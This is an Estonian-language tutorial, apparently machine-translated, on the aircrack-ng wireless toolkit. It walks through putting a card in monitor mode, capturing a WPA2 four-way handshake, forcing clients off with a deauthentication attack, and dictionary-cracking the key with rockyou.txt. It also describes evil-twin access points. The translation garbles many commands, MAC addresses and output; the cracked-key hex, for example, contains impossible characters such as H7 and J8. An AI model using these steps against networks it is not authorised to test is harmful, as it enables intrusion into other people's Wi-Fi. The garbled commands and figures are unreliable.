Kuidas Aircracki kasutada

How Use Aircrack Ng

Enamasti ei mõtle inimesed kunagi võrgule, millega nad on ühendatud. Nad ei mõtle kunagi, kui turvaline see võrk on ja kui palju nad igapäevaselt oma konfidentsiaalsete andmetega riskivad. Saate oma wifi võrkudes haavatavuse kontrolli käivitada, kasutades väga võimsat tööriista nimega Õhujõud ja Wireshark. Wiresharki kasutatakse võrgutegevuse jälgimiseks. Õhujõud on pigem agressiivne tööriist, mis võimaldab häkkida ja traadita ühendustele juurdepääsu anda. Sissetungijana mõtlemine on alati olnud kõige turvalisem viis end häkkimise eest kaitsta. Võimalik, et saate õhusõiduki tundmaõppimisel aru saada täpsetest toimingutest, mida sissetungija teie süsteemile juurdepääsu saamiseks teeb. Seejärel saate oma süsteemis vastavuskontrolli teha, et veenduda, et see pole ebaturvaline.

Õhujõud on täielik tarkvara, mis on loodud WiFi võrgu turvalisuse testimiseks. See ei ole lihtsalt üks tööriist, vaid tööriistade kogum, millest igaüks täidab teatud eesmärki. Wifi turvalisuse erinevate valdkondadega saab töötada, näiteks juurdepääsupunkti jälgimine, testimine, võrgu ründamine, WiFi -võrgu lõhkumine ja selle testimine. Aircracki põhieesmärk on pakettide pealtkuulamine ja paroolide murdmiseks räside dešifreerimine. See toetab peaaegu kõiki uusi traadita liideseid. Õhujõud on vananenud tööriistakomplekti Aircrack täiustatud versioon, viitab Uus põlvkond . Mõned suurepärased tööriistad, mis töötavad koos suurema ülesande täitmisel.

Airmon:

Airmon-ng on lisatud aircrack-ng komplekti, mis asetab võrguliidese kaardi monitorirežiimi. Võrgukaardid aktsepteerivad tavaliselt ainult neile suunatud pakette, nagu on määratletud NIC-i MAC-aadressis, kuid airmon-ng puhul võetakse vastu ka kõik traadita paketid, olenemata sellest, kas need on neile suunatud või mitte. Teil peaks olema võimalik neid pakette püüda ilma juurdepääsupunktiga linkimata või autentimata. Seda kasutatakse pääsupunkti oleku kontrollimiseks, lülitades võrguliidese monitorirežiimi. Esiteks tuleb konfigureerida juhtmevabad kaardid monitorirežiimi sisselülitamiseks ja seejärel tappa kõik taustprotsessid, kui arvate, et mõni protsess seda häirib. Pärast protsesside lõpetamist saab monitorirežiimi traadita liideses lubada, käivitades järgmise käsu:



[e -post kaitstud]: ~ $sudoairmon-ng start wlan0#

Samuti saate monitorirežiimi välja lülitada, peatades airmon-ng igal ajal, kasutades järgmist käsku:

[e -post kaitstud]: ~ $sudoairmon-ng stop wlan0#

Õhupump:

Airodump-ng kasutatakse kõigi meid ümbritsevate võrkude loetlemiseks ja nende kohta väärtusliku teabe vaatamiseks. Airodump-ng põhifunktsioon on pakettide nuusutamine, nii et see on sisuliselt programmeeritud haarama kõik meie ümber olevad paketid monitorirežiimis olles. Me kasutame seda kõigi meie ümber olevate ühenduste vastu ja kogume andmeid, nagu võrguga ühendatud klientide arv, neile vastavad mac -aadressid, krüptimisstiil ja kanalite nimed, ning hakkame seejärel sihtmärki sihtima.

Sisestades käsu airodump-ng ja andes sellele parameetrina võrguliidese nime, saame selle tööriista aktiveerida. See loetleb kõik pöörduspunktid, andmepakettide hulga, kasutatud krüpteerimis- ja autentimismeetodid ning võrgu nime (ESSID). Häkkimise seisukohast on mac -aadressid kõige olulisemad väljad.

[e -post kaitstud]: ~ $sudoairodump-ng wlx0mon

Lennuk:

Aircracki kasutatakse parooli murdmiseks. Pärast kõigi pakettide hõivamist airodumpi abil saame võtme lennata. See lõhub neid võtmeid, kasutades kahte meetodit PTW ja FMS. PTW lähenemine toimub kahes etapis. Esialgu kasutatakse ainult ARP -pakette ja alles siis, kui võtit pärast otsingut ei pragunenud, kasutab see kõiki teisi jäädvustatud pakette. PTW lähenemisviisi pluss on see, et kõiki pakette ei kasutata pragunemiseks. Teises lähenemisviisis, st FMS -is, kasutame võtme lõhkumiseks nii statistilisi mudeleid kui ka toore jõu algosid. Võib kasutada ka sõnastiku meetodit.

Eetris:

Airplay-ng tutvustab pakette traadita võrku, et luua või kiirendada liiklust. Aireplay-ng saab jäädvustada kahest erinevast allikast pärit pakette. Esimene on reaalajas võrk ja teine ​​juba olemasoleva pcap -faili paketid. Airplay-ng on kasulik autentimisrünnaku ajal, mis on suunatud traadita pääsupunktile ja kasutajale. Veelgi enam, saate rünnakuid, näiteks kohvi latte rünnakut sooritada, kasutades airplay-ng-tööriista, mis võimaldab teil võtme hankida kliendi süsteemist. Seda saate saavutada ARP -paketi püüdmisega, seejärel sellega manipuleerimisega ja süsteemi tagasi saatmisega. Seejärel loob klient paketi, mille saab airodump jäädvustada ja aircrack lõhub selle muudetud paketi võtme. Mõned muud airplay-ng rünnakuvõimalused hõlmavad hakkimist, fragmentide eelmängu jne.

Lennubaas:

Airbase-ng kasutatakse sissetungija arvuti muutmiseks ohustatud ühenduspunktiks, millega teised saavad linkida. Airbase-ng abil saate väita, et olete seaduslik juurdepääsupunkt ja korraldada rünnakuid võrguga ühendatud arvutitele. Selliseid rünnakuid nimetatakse kurjadeks kaksikrünnakuteks. Põhikasutajatel on võimatu eristada seaduslikku pääsupunkti ja võltspöörduspunkti. Niisiis, kurja kaksikuoht on üks ähvardavamaid traadita ohte, millega me täna silmitsi seisame.

Airolib-ng:

Airolib kiirendab häkkimisprotsessi, salvestades ja haldades parooliloendeid ja pääsupunkti. Selle programmi kasutatav andmebaasihaldussüsteem on SQLite3, mis on enamasti saadaval kõigil platvormidel. Paroolimurdmine hõlmab paarikaupa põhivõtme arvutamist, mille kaudu eraldatakse privaatne mööduv võti (PTK). PTK abil saate määrata antud paketi raamiteate identifitseerimiskoodi (MIC) ja teoreetiliselt leida, et MIC on paketiga sarnane, nii et kui PTK -l oli õigus, oli ka PMK -l õigus.

Andmebaasi salvestatud parooliloendite ja juurdepääsuvõrkude vaatamiseks tippige järgmine käsk:

[e -post kaitstud]: ~ $sudoairolib-ng testandmebaas-statistika

Siin on testandmebaas db, millele soovite juurde pääseda või mida luua, ja –stats on toiming, mida soovite sellel teha. Saate andmebaasi väljadel teha mitmeid toiminguid, näiteks anda mõnele SSID -le maksimaalne prioriteet või midagi sellist. Airolib-ng ja aircrack-ng kasutamiseks sisestage järgmine käsk:

[e -post kaitstud]: ~ $sudoõhulennuk-rtestandmebaas wpa2.eapol.cap

Siin kasutame juba arvutatud PMK -sid, mis on salvestatud kausta testide andmebaas paroolimurdmise kiirendamiseks.

WPA/WPA2 pragunemine Aircrack-ng abil:

Vaatame väikest näidet selle kohta, mida aircrack-ng suudab mõne suurepärase tööriista abil teha. Purustame sõnastikumeetodi abil WPA/WPA2 võrgu eeljagatud võtme.

Esimene asi, mida peame tegema, on loetleda monitorirežiimi toetavad võrguliidesed. Seda saab teha järgmise käsu abil:

[e -post kaitstud]: ~ $sudoõhk-õhk

PHY liidese draiveri kiibistik

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Näeme liidest; nüüd peame panema leitud võrguliidese (wlx0) monitorirežiimi, kasutades järgmist käsku:

[e -post kaitstud]: ~ $sudoairmon-ng start wlx0

See on lubanud monitori režiimi liidesel nimega wlx0mon .

Nüüd peaksime kuulama lähedalasuvate ruuterite saateid meie võrguliidese kaudu, mille oleme monitorirežiimi seadnud.

[e -post kaitstud]: ~ $sudoairodump-ng wlx0mon

CH5 ][Möödunud:30s][ 2020-12-02 00:17



BSSID PWR majakad#Andmed, #/s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -Neli, viis 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10: OLGE-63 77 0 0 654e. WPA2 CCMP PSK häkkimine

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: ANNAB:88: FA:38: 02-68 28 2 0 üksteist54e WPA2 CCMP PSK TP-Link_3802



BSSID STATION PWR kadunud raamide sondi



E4: 6F:13: 04: CE:315C: 3A:Neli, viis: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e-6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31EKr:91: B5: F8: 7E: D5 -390e-1 1002 13

Meie sihtvõrk on Hull sel juhul, mis töötab praegu kanalil 1.

Sihtvõrgu parooli murdmiseks peame jäädvustama 4-suunalise käepigistuse, mis juhtub siis, kui seade proovib võrguga ühendust luua. Saame selle jäädvustada järgmise käsu abil:

[e -post kaitstud]: ~ $sudoõhupump-ng-c 1--bassid E4: 6F:13: 04: CE:31 -sisse /kodu wlx0

-c : Kanal

–bssid : Sihtvõrgu Bssid

-sisse : Selle kataloogi nimi, kuhu pcap -fail paigutatakse

Nüüd peame ootama seadme võrguga ühenduse loomist, kuid käepigistuse jäädvustamiseks on parem viis. Saame seadmed AP -le autentida, kasutades autentimisrünnakut, kasutades järgmist käsku:

[e -post kaitstud]: ~ $sudoeetrimäng-0 -juurdeE4: 6F:13: 04: CE:31

et : Sihtvõrgu Bssid

-0 : autentimise rünnak

Oleme kõik seadmed lahti ühendanud ja nüüd peame ootama seadme võrguga ühenduse loomist.

CH1 ][Möödunud:30s][ 2020-12-02 00:02][WPA käepigistus: E4: 6F:13: 04: CE:31



BSSID PWR RXQ majakad#Andmed, #/s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154. WPA2 CCMP PSK lk



BSSID STATION PWR kadunud raamide sondi



E4: 6F:13: 04: CE:31EKr:91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:Neli, viis: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708CrackIt

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1

Saime löögi ja vaadates kellaaja paremat ülanurka, näeme, et käepigistus on jäädvustatud. Nüüd vaadake määratud kausta ( /Kodu meie puhul) a jaoks .pcap faili.

WPA võtme murdmiseks saame kasutada järgmist käsku:

[e -post kaitstud]: ~ $sudoõhulennuk-2 -sisserockyou.txt-bE4: 6F:13: 04: CE:31käepigistus

b: sihtvõrgu Bssid

-a2: WPA2 režiim

Rockyou.txt: sõnastikfailikasutatud

Käepigistus. Kork:faili missisaldab jäädvustatud käepigistust

Õhujõud1.2beeta3

[00:01:49] 10566võtmed testitud(1017,96et/s)

VÕTME LEITUD! [Tõmbasid mu haneks]

Peavõti: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FviiskümmendC


Mööduv võti: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED eKr 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FviiskümmendC025 62E9 5D71

Meie sihtvõrgu võti on edukalt murtud.

Järeldus:

Traadita võrgud on kõikjal, mida kasutavad kõik ettevõtted, alates nutitelefoni kasutavatest töötajatest kuni tööstuslike juhtimisseadmeteni. Uuringute kohaselt on aastal 2021 peaaegu üle 50 protsendi Interneti -liiklusest WiFi kaudu mis tahes muu kasutaja jaoks ja saab hõlpsalt ühendada teie mobiilseadmed kodukontoritega, kui te pole kohal.

Vaatamata nendele eelistele on teie privaatsuse ja turvalisuse kohta suur küsimärk. Kuna need võrgud; edastuspiirkonnas asuvad ruuterid on kõigile avatud, neid saab hõlpsasti rünnata ja teie andmed võivad kergesti ohtu sattuda. Näiteks kui olete ühendatud mõne avaliku wifi -ga, saab igaüks, kes on selle võrguga ühendatud, hõlpsalt teie võrguliiklust kontrollida, kasutades mõningaid luureandmeid ja saadaolevate suurepäraste tööriistade abil, ja isegi selle tühjendada.